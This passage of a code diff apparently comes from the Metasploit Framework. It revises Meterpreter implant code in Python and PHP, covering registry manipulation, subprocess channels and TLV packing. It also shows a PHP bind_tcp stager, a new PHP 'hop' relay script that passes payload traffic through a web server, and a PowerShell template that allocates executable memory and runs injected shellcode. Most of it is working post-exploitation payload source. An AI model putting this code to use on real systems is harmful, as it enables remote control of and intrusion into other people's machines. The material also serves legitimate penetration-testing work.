 	for iface_name, iface_info in interfaces.items():
 		iface_info['index'] = ifnames.index(iface_name)
@@ -1138,7 +1170,10 @@ def stdapi_net_config_get_interfaces_via_windll():
 		iface_info['index'] = AdapterAddresses.u.s.IfIndex
 		if AdapterAddresses.PhysicalAddressLength:
 			iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength)
-		iface_info['name'] = str(ctypes.wstring_at(AdapterAddresses.Description))
+		iface_desc = ctypes.wstring_at(AdapterAddresses.Description)
+		if not is_str(iface_desc):
+			iface_desc = str(iface_desc)
+		iface_info['name'] = iface_desc
 		iface_info['mtu'] = AdapterAddresses.Mtu
 		pUniAddr = AdapterAddresses.FirstUnicastAddress
 		while pUniAddr:
@@ -1174,7 +1209,7 @@ def stdapi_net_config_get_interfaces_via_windll_mib():
 	table_data = ctypes.string_at(table, pdwSize.value)
 	entries = struct.unpack('I', table_data[:4])[0]
 	table_data = table_data[4:]
-	for i in xrange(entries):
+	for i in range(entries):
 		addrrow = cstruct_unpack(MIB_IPADDRROW, table_data)
 		ifrow = MIB_IFROW()
 		ifrow.dwIndex = addrrow.dwIndex
@@ -1244,9 +1279,10 @@ def stdapi_registry_close_key(request, response):
 def stdapi_registry_create_key(request, response):
 	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
 	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
+	base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
 	permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
 	res_key = ctypes.c_void_p()
-	if ctypes.windll.advapi32.RegCreateKeyExA(root_key, base_key, 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
+	if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
 		response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
 		return ERROR_SUCCESS, response
 	return ERROR_FAILURE, response
@@ -1255,18 +1291,20 @@ def stdapi_registry_create_key(request, response):
 def stdapi_registry_delete_key(request, response):
 	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
 	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
+	base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
 	flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value']
 	if (flags & DELETE_KEY_FLAG_RECURSIVE):
-		result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, base_key)
+		result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, ctypes.byref(base_key))
 	else:
-		result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, base_key)
+		result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, ctypes.byref(base_key))
 	return result, response
 
 @meterpreter.register_function_windll
 def stdapi_registry_delete_value(request, response):
 	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
 	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
-	result = ctypes.windll.advapi32.RegDeleteValueA(root_key, value_name)
+	value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
+	result = ctypes.windll.advapi32.RegDeleteValueA(root_key, ctypes.byref(value_name))
 	return result, response
 
 @meterpreter.register_function_windll
@@ -1335,9 +1373,10 @@ def stdapi_registry_load_key(request, response):
 def stdapi_registry_open_key(request, response):
 	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
 	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
+	base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
 	permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
 	handle_id = ctypes.c_void_p()
-	if ctypes.windll.advapi32.RegOpenKeyExA(root_key, base_key, 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
+	if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
 		response += tlv_pack(TLV_TYPE_HKEY, handle_id.value)
 		return ERROR_SUCCESS, response
 	return ERROR_FAILURE, response
@@ -1367,24 +1406,26 @@ def stdapi_registry_query_class(request, response):
 
 @meterpreter.register_function_windll
 def stdapi_registry_query_value(request, response):
-	REG_SZ = 1
-	REG_DWORD = 4
 	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
 	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
+	value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
 	value_type = ctypes.c_uint32()
 	value_type.value = 0
 	value_data = (ctypes.c_ubyte * 4096)()
 	value_data_sz = ctypes.c_uint32()
 	value_data_sz.value = ctypes.sizeof(value_data)
-	result = ctypes.windll.advapi32.RegQueryValueExA(hkey, value_name, 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
+	result = ctypes.windll.advapi32.RegQueryValueExA(hkey, ctypes.byref(value_name), 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
 	if result == ERROR_SUCCESS:
 		response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value)
-		if value_type.value == REG_SZ:
-			response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
-		elif value_type.value == REG_DWORD:
+		if value_type.value == winreg.REG_SZ:
+			response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + NULL_BYTE)
+		elif value_type.value == winreg.REG_DWORD:
 			value = value_data[:4]
 			value.reverse()
-			value = ''.join(map(chr, value))
+			if sys.version_info[0] < 3:
+				value = ''.join(map(chr, value))
+			else:
+				value = bytes(value)
 			response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
 		else:
 			response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
@@ -1395,9 +1436,10 @@ def stdapi_registry_query_value(request, response):
 def stdapi_registry_set_value(request, response):
 	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
 	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
+	value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
 	value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value']
 	value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value']
-	result = ctypes.windll.advapi32.RegSetValueExA(hkey, value_name, 0, value_type, value_data, len(value_data))
+	result = ctypes.windll.advapi32.RegSetValueExA(hkey, ctypes.byref(value_name), 0, value_type, value_data, len(value_data))
 	return result, response
 
 @meterpreter.register_function_windll

data/meterpreter/meterpreter.php

@@ -125,6 +125,7 @@ define("TLV_META_TYPE_STRING",     (1 << 16));
 define("TLV_META_TYPE_UINT",       (1 << 17));
 define("TLV_META_TYPE_RAW",        (1 << 18));
 define("TLV_META_TYPE_BOOL",       (1 << 19));
+define("TLV_META_TYPE_QWORD",      (1 << 20));
 define("TLV_META_TYPE_COMPRESSED", (1 << 29));
 define("TLV_META_TYPE_GROUP",      (1 << 30));
 define("TLV_META_TYPE_COMPLEX",    (1 << 31));
@@ -655,6 +656,11 @@ function tlv_pack($tlv) {
     if (($tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
         $ret = pack("NNa*", 8 + strlen($tlv['value'])+1, $tlv['type'], $tlv['value'] . "\0");
     }
+    elseif (($tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD) {
+        $hi = ($tlv['value'] >> 32) & 0xFFFFFFFF;
+        $lo = $tlv['value'] & 0xFFFFFFFF;
+        $ret = pack("NNNN", 8 + 8, $tlv['type'], $hi, $lo);
+    }
     elseif (($tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
         $ret = pack("NNN", 8 + 4, $tlv['type'], $tlv['value']);
     }
@@ -686,10 +692,17 @@ function tlv_unpack($raw_tlv) {
     my_print("len: {$tlv['len']}, type: {$tlv['type']}");
     if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
         $tlv = unpack("Nlen/Ntype/a*value", substr($raw_tlv, 0, $tlv['len']));
+        # PHP 5.5.0 modifed the 'a' unpack format to stop removing the trailing
+        # NULL, so catch that here
+        $tlv['value'] = str_replace("\0", "", $tlv['value']);
     }
     elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
         $tlv = unpack("Nlen/Ntype/Nvalue", substr($raw_tlv, 0, $tlv['len']));
     }
+    elseif (($type & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD) {
+        $tlv = unpack("Nlen/Ntype/Nhi/Nlo", substr($raw_tlv, 0, $tlv['len']));
+        $tlv['value'] = $tlv['hi'] << 32 | $tlv['lo'];
+    }
     elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
         $tlv = unpack("Nlen/Ntype/cvalue", substr($raw_tlv, 0, $tlv['len']));
     }
@@ -911,7 +924,8 @@ function read($resource, $len=null) {
         $r = Array($resource);
         my_print("Calling select to see if there's data on $resource");
         while (true) {
-            $cnt = stream_select($r, $w=NULL, $e=NULL, 0);
+            $w=NULL;$e=NULL;$t=0;
+            $cnt = stream_select($r, $w, $e, $t);
 
             # Stream is not ready to read, have to live with what we've gotten
             # so far
@@ -1147,7 +1161,8 @@ add_reader($msgsock);
 # Main dispatch loop
 #
 $r=$GLOBALS['readers'];
-while (false !== ($cnt = select($r, $w=null, $e=null, 1))) {
+$w=NULL;$e=NULL;$t=1;
+while (false !== ($cnt = select($r, $w, $e, $t))) {
     #my_print(sprintf("Returned from select with %s readers", count($r)));
     $read_failed = false;
     for ($i = 0; $i < $cnt; $i++) {

data/meterpreter/meterpreter.py

@@ -1,12 +1,5 @@
 #!/usr/bin/python
 import code
-try:
-	import ctypes
-except:
-	has_windll = False
-else:
-	has_windll = hasattr(ctypes, 'windll')
-
 import os
 import random
 import select
@@ -15,10 +8,30 @@ import struct
 import subprocess
 import sys
 import threading
+import time
+import traceback
+
+try:
+	import ctypes
+except ImportError:
+	has_windll = False
+else:
+	has_windll = hasattr(ctypes, 'windll')
+
+if sys.version_info[0] < 3:
+	is_bytes = lambda obj: issubclass(obj.__class__, str)
+	bytes = lambda *args: str(*args[:1])
+	NULL_BYTE = '\x00'
+else:
+	is_bytes = lambda obj: issubclass(obj.__class__, bytes)
+	str = lambda x: __builtins__['str'](x, 'UTF-8')
+	NULL_BYTE = bytes('\x00', 'UTF-8')
 
 #
 # Constants
 #
+DEBUGGING = False
+
 PACKET_TYPE_REQUEST        = 0
 PACKET_TYPE_RESPONSE       = 1
 PACKET_TYPE_PLAIN_REQUEST  = 10
@@ -41,6 +54,7 @@ TLV_META_TYPE_STRING     = (1 << 16)
 TLV_META_TYPE_UINT       = (1 << 17)
 TLV_META_TYPE_RAW        = (1 << 18)
 TLV_META_TYPE_BOOL       = (1 << 19)
+TLV_META_TYPE_QWORD      = (1 << 20)
 TLV_META_TYPE_COMPRESSED = (1 << 29)
 TLV_META_TYPE_GROUP      = (1 << 30)
 TLV_META_TYPE_COMPLEX    = (1 << 31)
@@ -100,6 +114,7 @@ TLV_TYPE_LOCAL_HOST            = TLV_META_TYPE_STRING  | 1502
 TLV_TYPE_LOCAL_PORT            = TLV_META_TYPE_UINT    | 1503
 
 EXPORTED_SYMBOLS = {}
+EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
 
 def export(symbol):
 	EXPORTED_SYMBOLS[symbol.__name__] = symbol
@@ -107,7 +122,7 @@ def export(symbol):
 
 def generate_request_id():
 	chars = 'abcdefghijklmnopqrstuvwxyz'
-	return ''.join(random.choice(chars) for x in xrange(32))
+	return ''.join(random.choice(chars) for x in range(32))
 
 @export
 def inet_pton(family, address):
@@ -125,25 +140,6 @@ def inet_pton(family, address):
 			return ''.join(map(chr, lpAddress[8:24]))
 	raise Exception('no suitable inet_pton functionality is available')
 
-@export
-def packet_get_tlv(pkt, tlv_type):
-	offset = 0
-	while (offset < len(pkt)):
-		tlv = struct.unpack('>II', pkt[offset:offset+8])
-		if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
-			val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
-			if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
-				val = val.split('\x00', 1)[0]
-			elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
-				val = struct.unpack('>I', val)[0]
-			elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
-				val = bool(struct.unpack('b', val)[0])
-			elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
-				pass
-			return {'type':tlv[1], 'length':tlv[0], 'value':val}
-		offset += tlv[0]
-	return {}
-
 @export
 def packet_enum_tlvs(pkt, tlv_type = None):
 	offset = 0
@@ -152,9 +148,11 @@ def packet_enum_tlvs(pkt, tlv_type = None):
 		if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
 			val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
 			if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
-				val = val.split('\x00', 1)[0]
+				val = str(val.split(NULL_BYTE, 1)[0])
 			elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
 				val = struct.unpack('>I', val)[0]
+			elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
+				val = struct.unpack('>Q', val)[0]
 			elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
 				val = bool(struct.unpack('b', val)[0])
 			elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
@@ -163,6 +161,14 @@ def packet_enum_tlvs(pkt, tlv_type = None):
 		offset += tlv[0]
 	raise StopIteration()
 
+@export
+def packet_get_tlv(pkt, tlv_type):
+	try:
+		tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
+	except IndexError:
+		return {}
+	return tlv
+
 @export
 def tlv_pack(*args):
 	if len(args) == 2:
@@ -170,20 +176,35 @@ def tlv_pack(*args):
 	else:
 		tlv = args[0]
 	data = ""
-	if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
-		data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00'
-	elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
+	if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
 		data = struct.pack('>III', 12, tlv['type'], tlv['value'])
+	elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
+		data = struct.pack('>IIQ', 16, tlv['type'], tlv['value'])
 	elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
-		data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value'])))
-	elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
-		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
-	elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
-		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
-	elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
-		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
+		data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8')
+	else:
+		value = tlv['value']
+		if not is_bytes(value):
+			value = bytes(value, 'UTF-8')
+		if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
+			data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
+		elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
+			data = struct.pack('>II', 8 + len(value), tlv['type']) + value
+		elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
+			data = struct.pack('>II', 8 + len(value), tlv['type']) + value
+		elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
+			data = struct.pack('>II', 8 + len(value), tlv['type']) + value
 	return data
 
+#@export
+class MeterpreterFile(object):
+	def __init__(self, file_obj):
+		self.file_obj = file_obj
+
+	def __getattr__(self, name):
+		return getattr(self.file_obj, name)
+export(MeterpreterFile)
+
 #@export
 class MeterpreterSocket(object):
 	def __init__(self, sock):
@@ -208,11 +229,11 @@ class STDProcessBuffer(threading.Thread):
 		threading.Thread.__init__(self)
 		self.std = std
 		self.is_alive = is_alive
-		self.data = ''
+		self.data = bytes()
 		self.data_lock = threading.RLock()
 
 	def run(self):
-		for byte in iter(lambda: self.std.read(1), ''):
+		for byte in iter(lambda: self.std.read(1), bytes()):
 			self.data_lock.acquire()
 			self.data += byte
 			self.data_lock.release()
@@ -220,15 +241,20 @@ class STDProcessBuffer(threading.Thread):
 	def is_read_ready(self):
 		return len(self.data) != 0
 
-	def read(self, l = None):
-		data = ''
+	def peek(self, l = None):
+		data = bytes()
 		self.data_lock.acquire()
 		if l == None:
 			data = self.data
-			self.data = ''
 		else:
 			data = self.data[0:l]
-			self.data = self.data[l:]
+		self.data_lock.release()
+		return data
+
+	def read(self, l = None):
+		self.data_lock.acquire()
+		data = self.peek(l)
+		self.data = self.data[len(data):]
 		self.data_lock.release()
 		return data
 
@@ -236,12 +262,25 @@ class STDProcessBuffer(threading.Thread):
 class STDProcess(subprocess.Popen):
 	def __init__(self, *args, **kwargs):
 		subprocess.Popen.__init__(self, *args, **kwargs)
+		self.echo_protection = False
 
 	def start(self):
 		self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
 		self.stdout_reader.start()
 		self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
 		self.stderr_reader.start()
+
+	def write(self, channel_data):
+		self.stdin.write(channel_data)
+		self.stdin.flush()
+		if self.echo_protection:
+			end_time = time.time() + 0.5
+			out_data = bytes()
+			while (time.time() < end_time) and (out_data != channel_data):
+				if self.stdout_reader.is_read_ready():
+					out_data = self.stdout_reader.peek(len(channel_data))
+			if out_data == channel_data:
+				self.stdout_reader.read(len(channel_data))
 export(STDProcess)
 
 class PythonMeterpreter(object):
@@ -251,7 +290,7 @@ class PythonMeterpreter(object):
 		self.channels = {}
 		self.interact_channels = []
 		self.processes = {}
-		for func in filter(lambda x: x.startswith('_core'), dir(self)):
+		for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
 			self.extension_functions[func[1:]] = getattr(self, func)
 		self.running = True
 
@@ -265,6 +304,7 @@ class PythonMeterpreter(object):
 		return func
 
 	def add_channel(self, channel):
+		assert(isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket)))
 		idx = 0
 		while idx in self.channels:
 			idx += 1
@@ -286,7 +326,7 @@ class PythonMeterpreter(object):
 					break
 				req_length, req_type = struct.unpack('>II', request)
 				req_length -= 8
-				request = ''
+				request = bytes()
 				while len(request) < req_length:
 					request += self.socket.recv(4096)
 				response = self.create_response(request)
@@ -294,17 +334,17 @@ class PythonMeterpreter(object):
 			else:
 				channels_for_removal = []
 				# iterate over the keys because self.channels could be modified if one is closed
-				channel_ids = self.channels.keys()
+				channel_ids = list(self.channels.keys())
 				for channel_id in channel_ids:
 					channel = self.channels[channel_id]
-					data = ''
+					data = bytes()
 					if isinstance(channel, STDProcess):
 						if not channel_id in self.interact_channels:
 							continue
-						if channel.stdout_reader.is_read_ready():
-							data = channel.stdout_reader.read()
-						elif channel.stderr_reader.is_read_ready():
+						if channel.stderr_reader.is_read_ready():
 							data = channel.stderr_reader.read()
+						elif channel.stdout_reader.is_read_ready():
+							data = channel.stdout_reader.read()
 						elif channel.poll() != None:
 							self.handle_dead_resource_channel(channel_id)
 					elif isinstance(channel, MeterpreterSocketClient):
@@ -312,7 +352,7 @@ class PythonMeterpreter(object):
 							try:
 								d = channel.recv(1)
 							except socket.error:
-								d = ''
+								d = bytes()
 							if len(d) == 0:
 								self.handle_dead_resource_channel(channel_id)
 								break
@@ -357,13 +397,13 @@ class PythonMeterpreter(object):
 		data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
 		if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
 			return ERROR_FAILURE
-		preloadlib_methods = self.extension_functions.keys()
+		preloadlib_methods = list(self.extension_functions.keys())
 		symbols_for_extensions = {'meterpreter':self}
 		symbols_for_extensions.update(EXPORTED_SYMBOLS)
 		i = code.InteractiveInterpreter(symbols_for_extensions)
 		i.runcode(compile(data_tlv['value'], '', 'exec'))
-		postloadlib_methods = self.extension_functions.keys()
-		new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
+		postloadlib_methods = list(self.extension_functions.keys())
+		new_methods = list(filter(lambda x: x not in preloadlib_methods, postloadlib_methods))
 		for method in new_methods:
 			response += tlv_pack(TLV_TYPE_METHOD, method)
 		return ERROR_SUCCESS, response
@@ -386,10 +426,10 @@ class PythonMeterpreter(object):
 		if channel_id not in self.channels:
 			return ERROR_FAILURE, response
 		channel = self.channels[channel_id]
-		if isinstance(channel, file):
-			channel.close()
-		elif isinstance(channel, subprocess.Popen):
+		if isinstance(channel, subprocess.Popen):
 			channel.kill()
+		elif isinstance(channel, MeterpreterFile):
+			channel.close()
 		elif isinstance(channel, MeterpreterSocket):
 			channel.close()
 		else:
@@ -405,7 +445,7 @@ class PythonMeterpreter(object):
 			return ERROR_FAILURE, response
 		channel = self.channels[channel_id]
 		result = False
-		if isinstance(channel, file):
+		if isinstance(channel, MeterpreterFile):
 			result = channel.tell() >= os.fstat(channel.fileno()).st_size
 		response += tlv_pack(TLV_TYPE_BOOL, result)
 		return ERROR_SUCCESS, response
@@ -432,13 +472,13 @@ class PythonMeterpreter(object):
 			return ERROR_FAILURE, response
 		channel = self.channels[channel_id]
 		data = ''
-		if isinstance(channel, file):
-			data = channel.read(length)
-		elif isinstance(channel, STDProcess):
+		if isinstance(channel, STDProcess):
 			if channel.poll() != None:
 				self.handle_dead_resource_channel(channel_id)
 			if channel.stdout_reader.is_read_ready():
 				data = channel.stdout_reader.read(length)
+		elif isinstance(channel, MeterpreterFile):
+			data = channel.read(length)
 		elif isinstance(channel, MeterpreterSocket):
 			data = channel.recv(length)
 		else:
@@ -454,13 +494,13 @@ class PythonMeterpreter(object):
 			return ERROR_FAILURE, response
 		channel = self.channels[channel_id]
 		l = len(channel_data)
-		if isinstance(channel, file):
-			channel.write(channel_data)
-		elif isinstance(channel, subprocess.Popen):
+		if isinstance(channel, subprocess.Popen):
 			if channel.poll() != None:
 				self.handle_dead_resource_channel(channel_id)
 				return ERROR_FAILURE, response
-			channel.stdin.write(channel_data)
+			channel.write(channel_data)
+		elif isinstance(channel, MeterpreterFile):
+			channel.write(channel_data)
 		elif isinstance(channel, MeterpreterSocket):
 			try:
 				l = channel.send(channel_data)
@@ -485,13 +525,17 @@ class PythonMeterpreter(object):
 		if handler_name in self.extension_functions:
 			handler = self.extension_functions[handler_name]
 			try:
-				#print("[*] running method {0}".format(handler_name))
+				if DEBUGGING:
+					print('[*] running method ' + handler_name)
 				result, resp = handler(request, resp)
-			except Exception, err:
-				#print("[-] method {0} resulted in an error".format(handler_name))
+			except Exception:
+				if DEBUGGING:
+					print('[-] method ' + handler_name + ' resulted in an error')
+					traceback.print_exc(file=sys.stderr)
 				result = ERROR_FAILURE
 		else:
-			#print("[-] method {0} was requested but does not exist".format(handler_name))
+			if DEBUGGING:
+				print('[-] method ' + handler_name + ' was requested but does not exist')
 			result = ERROR_FAILURE
 		resp += tlv_pack(TLV_TYPE_RESULT, result)
 		resp = struct.pack('>I', len(resp) + 4) + resp
@@ -499,6 +543,9 @@ class PythonMeterpreter(object):
 
 if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
 	if hasattr(os, 'setsid'):
-		os.setsid()
+		try:
+			os.setsid()
+		except OSError:
+			pass
 	met = PythonMeterpreter(s)
 	met.run()

data/php/bind_tcp.php

@@ -9,24 +9,27 @@ if (is_callable('stream_socket_server')) {
 	$srvsock = stream_socket_server("tcp://{$ipaddr}:{$port}");
 	if (!$srvsock) { die(); }
 	$s = stream_socket_accept($srvsock, -1);
+	fclose($srvsock);
 	$s_type = 'stream';
 } elseif (is_callable('socket_create_listen')) {
 	$srvsock = socket_create_listen(AF_INET, SOCK_STREAM, SOL_TCP);
 	if (!$res) { die(); }
 	$s = socket_accept($srvsock);
+	socket_close($srvsock);
 	$s_type = 'socket';
 } elseif (is_callable('socket_create')) {
 	$srvsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
 	$res = socket_bind($srvsock, $ipaddr, $port);
 	if (!$res) { die(); }
 	$s = socket_accept($srvsock);
+	socket_close($srvsock);
 	$s_type = 'socket';
 } else {
 	die();
 }
 if (!$s) { die(); }
 
-switch ($s_type) { 
+switch ($s_type) {
 case 'stream': $len = fread($s, 4); break;
 case 'socket': $len = socket_read($s, 4); break;
 }
@@ -40,7 +43,7 @@ $len = $a['len'];
 
 $b = '';
 while (strlen($b) < $len) {
-	switch ($s_type) { 
+	switch ($s_type) {
 	case 'stream': $b .= fread($s, $len-strlen($b)); break;
 	case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
 	}

data/php/hop.php

@@ -0,0 +1,68 @@
+<?php
+$magic = 'TzGq';
+$tempdir = sys_get_temp_dir() . "/hop" . $magic;
+if(!is_dir($tempdir)){
+	mkdir($tempdir); //make sure it's there
+}
+
+//get url
+$url = $_SERVER["QUERY_STRING"];
+//like /path/hop.php?/uRIcksm_lOnGidENTifIEr
+
+//Looks for a file with a name or contents prefix, if found, send it and deletes it
+function findSendDelete($tempdir, $prefix, $one=true){
+	if($dh = opendir($tempdir)){
+		while(($file = readdir($dh)) !== false){
+			if(strpos($file, $prefix) !== 0){
+				continue;
+			}
+			readfile($tempdir."/".$file);
+			unlink($tempdir."/".$file);
+			if($one){
+				break;
+			}
+		}
+	}
+}
+
+//handle control
+if($url === "/control"){
+	if($_SERVER['REQUEST_METHOD'] === 'POST'){
+		//handle data for payload - save in a "down" file or the "init" file
+		$postdata = file_get_contents("php://input");
+		if(array_key_exists('HTTP_X_INIT', $_SERVER)){
+			$f = fopen($tempdir."/init", "w"); //only one init file
+		}else{
+			$prefix = "down_" . bin2hex($_SERVER['HTTP_X_URLFRAG']);
+			$f = fopen(tempnam($tempdir,$prefix), "w");
+		}
+		fwrite($f, $postdata);
+		fclose($f);
+	}else{
+		findSendDelete($tempdir, "up_", false);
+	}
+}else if($_SERVER['REQUEST_METHOD'] === 'POST'){
+	//get data
+	$postdata = file_get_contents("php://input");
+	//See if we should send anything down
+	if($postdata === 'RECV'){
+		findSendDelete($tempdir, "down_" . bin2hex($url));
+		$fname = $tempdir . "/up_recv_" . bin2hex($url); //Only keep one RECV poll
+	}else{
+		$fname = tempnam($tempdir, "up_"); //actual data gets its own filename
+	}
+	//find free and write new file
+	$f = fopen($fname, "w");
+	fwrite($f, $magic);
+	//Little-endian pack length and data
+	$urlen = strlen($url);
+	fwrite($f, pack('V', $urlen));
+	fwrite($f, $url);
+	$postdatalen = strlen($postdata);
+	fwrite($f, pack('V', $postdatalen));
+	fwrite($f, $postdata);
+	fclose($f);
+//Initial query will be a GET and have a 12345 in it
+}else if(strpos($url, "12345") !== FALSE){
+	readfile($tempdir."/init");
+}

data/templates/scripts/to_mem_old.ps1.template

@@ -11,10 +11,10 @@ $%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -n
 
 %{shellcode}
 
-$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,0x1000,[Math]::Max($%{var_code}.Length, 0x1000),0x40)
+$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)
 
 for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
-	$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
+  $%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
 }
 
 $%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)

data/webcam/answerer.html

@@ -10,7 +10,7 @@
 		height: 480px;
 		width: 640px;
 		border-radius: 15px;
-		-moz-border-raidus: 15px;
+		-moz-border-radius: 15px;
 		background-color: black;
 		position: absolute;
 		left: 50;
@@ -26,7 +26,7 @@
 		height: 180px;
 		width: 200px;
 		border-radius: 15px;
-		-moz-border-raidus: 15px;
+		-moz-border-radius: 15px;
 		background-color: #9B9B9B;
 		position: absolute;
 		top: 480;
@@ -66,8 +66,9 @@
 		left: 10;
 	}
 </style>
-<script src="=WEBRTCAPIJS="> </script>
 <script>
+	=WEBRTCAPIJS=
+
 	window.onerror = function(e) {
 		document.getElementById("message").innerHTML = "Error: " + e.toString();
 	}

data/webcam/offerer.html

@@ -2,6 +2,10 @@
 <head>
 	<title>Video session</title>
 	<style type="text/css">
+		body {
+			background: #fff;
+		}
+
 		div.dot1 {
 			position: absolute;
 			width: 20px;
@@ -84,8 +88,9 @@
 		}
